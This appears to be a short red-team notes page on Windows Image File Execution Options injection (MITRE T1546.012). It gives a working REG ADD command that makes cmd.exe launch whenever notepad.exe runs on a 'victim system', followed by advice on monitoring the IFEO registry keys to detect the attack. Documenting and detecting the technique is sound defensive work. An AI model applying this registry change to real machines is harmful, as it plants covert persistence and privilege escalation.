Image File Execution Options Injection
Defense Evasion, Persistence, Privilege Escalation

Modifying registry to set cmd.exe as notepad.exe debugger, so that when notepad.exe is executed, it will actually start cmd.exe:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"
Launching a notepad on the victim system:
Same from the cmd shell:

Monitoring command line arguments and events modifying registry keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/<executable> and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> should be helpful in detecting this attack:

Event Triggered Execution: Image File Execution Options Injection, Sub-technique T1546.012 - Enterprise | MITRE ATT&CK®
Image File Execution Options (IFEO)
A Debugging Approach to IFEO
Copy link
On this page